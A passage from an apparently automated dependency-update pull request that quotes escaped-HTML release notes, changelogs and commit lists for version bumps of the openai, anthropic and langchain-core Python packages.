href=\"https://github.com/openai/openai-python/blob/main/CHANGELOG.md\"\u003eopenai's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.37.0 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.36.0...v2.37.0\"\u003ev2.36.0...v2.37.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2d955a1ac69df0288b8072bbcd25905639e9b2ed\"\u003e\u003ccode\u003e2d955a1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3359\"\u003e#3359\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/519cd027919fa5b73bd8fe237e80c7a01b3e0b2f\"\u003e\u003ccode\u003e519cd02\u003c/code\u003e\u003c/a\u003e release: 2.41.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e\u003ccode\u003e87e46c2\u003c/code\u003e\u003c/a\u003e feat(api): responses.moderation and chat_completions.moderation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a28a3f6aa34f5ac6fcc2fafeb50112f2140c45ae\"\u003e\u003ccode\u003ea28a3f6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3352\"\u003e#3352\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/db6ccafa7b74b72caefbda6fb63bd5c904521770\"\u003e\u003ccode\u003edb6ccaf\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2264f700dad91e4f570eb7c0a6f10bbd22d34520\"\u003e\u003ccode\u003e2264f70\u003c/code\u003e\u003c/a\u003e release: 2.40.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e\u003ccode\u003e4d5bfde\u003c/code\u003e\u003c/a\u003e fix(api): allow setting bedrock api keys on the client directly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/ccef1436d9f52b5014597047e450eef543a87540\"\u003e\u003ccode\u003eccef143\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3326\"\u003e#3326\u003c/a\u003e from openai/codex/bedrock-responses-review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a50ff0a19084306a09012ff85f730ea2c129eef9\"\u003e\u003ccode\u003ea50ff0a\u003c/code\u003e\u003c/a\u003e Fix Bedrock with_options overrides\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/fdf4901e301fa01b368ede0b5b407dca42f07acc\"\u003e\u003ccode\u003efdf4901\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/openai/openai-python/compare/v2.32.0...v2.41.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `anthropic` from 0.96.0 to 0.107.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/releases\"\u003eanthropic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.107.0\u003c/h2\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.106.0\u003c/h2\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.105.2\u003c/h2\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.105.1\u003c/h2\u003e\n\u003ch2\u003e0.105.1 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.0...v0.105.1\"\u003ev0.105.0...v0.105.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e use Trusted Publishing for PyPI releases (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1d04fc52d2dd1f88e22808de2c53b0d66913631f\"\u003e1d04fc5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/blob/main/CHANGELOG.md\"\u003eanthropic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.105.1 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.0...v0.105.1\"\u003ev0.105.0...v0.105.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e use Trusted Publishing for PyPI releases (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1d04fc52d2dd1f88e22808de2c53b0d66913631f\"\u003e1d04fc5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.105.0 (2026-05-28)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.104.1...v0.105.0\"\u003ev0.104.1...v0.105.0\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/4ceca722bedbd923671365f1a36f86d09fbec657\"\u003e\u003ccode\u003e4ceca72\u003c/code\u003e\u003c/a\u003e release: 0.107.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3a6f9d9c217bdb504ddd229618149ab7e8033ad3\"\u003e\u003ccode\u003e3a6f9d9\u003c/code\u003e\u003c/a\u003e feat(api): small updates to Managed Agents types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/6a70c9f72b16b04348564c5b92961a82ebe4b7da\"\u003e\u003ccode\u003e6a70c9f\u003c/code\u003e\u003c/a\u003e release: 0.106.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/8fa41c8acf6885fd8b7a0a67f705bbb9d3058672\"\u003e\u003ccode\u003e8fa41c8\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1f553254640b45aecef37df0000da68dc2bcb9c5\"\u003e\u003ccode\u003e1f55325\u003c/code\u003e\u003c/a\u003e Don't leak ANTHROPIC_API_KEY to the Foundry endpoint (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/18\"\u003e#18\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a94498c6aa3dd4e237ed72dacdd26336bbd7d9fc\"\u003e\u003ccode\u003ea94498c\u003c/code\u003e\u003c/a\u003e fix(client): make Foundry client copy() and with_options() work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/907d849f8dfec50dfeda06b5cdde0ee268f9b7f9\"\u003e\u003ccode\u003e907d849\u003c/code\u003e\u003c/a\u003e chore(internal): fix artifact url\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/9676a5d0d40162a385001f60aa136f97b2718309\"\u003e\u003ccode\u003e9676a5d\u003c/code\u003e\u003c/a\u003e docs: point security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80c95b8cc47e2e0600be68dda707b3a7231929c8\"\u003e\u003ccode\u003e80c95b8\u003c/code\u003e\u003c/a\u003e chore(internal): fix branch names\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/e5584f948a8692b0fb205248324eb89f269b9b5a\"\u003e\u003ccode\u003ee5584f9\u003c/code\u003e\u003c/a\u003e chore(internal): update private repo name\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.96.0...v0.107.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-core` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain-core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-core==1.4.1\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-core==1.4.0\u003c/p\u003e\n\u003cp\u003erelease(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\nfix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\ndocs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\nrelease(anthropic): 1.4.4 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37757\"\u003e#37757\u003c/a\u003e)\nchore(core): bump \u003ccode\u003euuid-utils\u003c/code\u003e to 0.16.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37699\"\u003e#37699\u003c/a\u003e)\nchore(infra): bump \u003ccode\u003elangchain-tests\u003c/code\u003e floor to 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37610\"\u003e#37610\u003c/a\u003e)\nrelease(standard-tests): 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37609\"\u003e#37609\u003c/a\u003e)\nchore: bump idna from 3.11 to 3.15 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37539\"\u003e#37539\u003c/a\u003e)\nci(infra): harden Dependabot version-bound preservation (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37510\"\u003e#37510\u003c/a\u003e)\nhotfix: bump lockfiles (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37508\"\u003e#37508\u003c/a\u003e)\ndocs(core): note override for \u003ccode\u003e_get_ls_params\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37503\"\u003e#37503\u003c/a\u003e)\nchore(core,langchain,openai): refresh stale OpenAI model references (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37487\"\u003e#37487\u003c/a\u003e)\nchore: bump langsmith from 0.7.31 to 0.8.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37395\"\u003e#37395\u003c/a\u003e)\nfix(core): accept \u003ccode\u003eSerializable\u003c/code\u003e constructor-envelope wire shape in \u003ccode\u003e_convert_to_message\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37456\"\u003e#37456\u003c/a\u003e)\nfix(core): preserve chunk \u003ccode\u003eadditional_kwargs\u003c/code\u003e across v3 stream assembly (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37435\"\u003e#37435\u003c/a\u003e)\nfix(core): preserve reasoning blocks alongside tool_call in v3 stream (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37434\"\u003e#37434\u003c/a\u003e)\nchore: bump jupyter-server from 2.17.0 to 2.18.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37354\"\u003e#37354\u003c/a\u003e)\nchore: bump mistune from 3.1.4 to 3.2.1 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37353\"\u003e#37353\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/a401351e12b9a3e1670314adf2f7bbcf8811903c\"\u003e\u003ccode\u003ea401351\u003c/code\u003e\u003c/a\u003e release(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/053c368ba438ca077f1348147fadc5dad16d6898\"\u003e\u003ccode\u003e053c368\u003c/code\u003e\u003c/a\u003e fix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/0993edba86014788827144c175499755ec5b9f55\"\u003e\u003ccode\u003e0993edb\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37916\"\u003e#37916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6f7c8f54454ae45b07ca274cbfbb0afb8cef9041\"\u003e\u003ccode\u003e6f7c8f5\u003c/code\u003e\u003c/a\u003e chore: bump starlette from 0.49.1 to 1.0.1 in /libs/langchain (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37899\"\u003e#37899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/586bcd46a17be1eafc61127460d766b2a0611db3\"\u003e\u003ccode\u003e586bcd4\u003c/code\u003e\u003c/a\u003e docs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/9eab5237ccf7878648b2d33108a7f7e15331c452\"\u003e\u003ccode\u003e9eab523\u003c/code\u003e\u003c/a\u003e chore: bump requests from 2.34.0 to 2.34.2 in /libs/partners/xai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37903\"\u003e#37903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/be2e8f70bc472354f23e9f62519427dd2de7d332\"\u003e\u003ccode\u003ebe2e8f7\u003c/code\u003e\u003c/a\u003e ci(infra): add \u003ccode\u003eexclude\u003c/code\u003e input to skip libs in scheduled integration tests (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/3b999176c84c1236e1f6fbaa5194782360e82264\"\u003e\u003ccode\u003e3b99917\u003c/code\u003e\u003c/a\u003e test(langchain,partners): disable pytest-benchmark under xdist to silence `Py...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/34af59c1a69c403d7b34d0bbd9ceffd287e3b0ed\"\u003e\u003ccode\u003e34af59c\u003c/code\u003e\u003c/a\u003e fix(partners): cap aiohttp below 3.14 for vcrpy compat (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37898\"\u003e#37898\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/414d7b8e94fca5102e87a1f7a6c70e32622a85b9\"\u003e\u003ccode\u003e414d7b8\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37895\"\u003e#37895\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain-core==1.4.0...langchain-core==1.4.1\"\u003ecompare 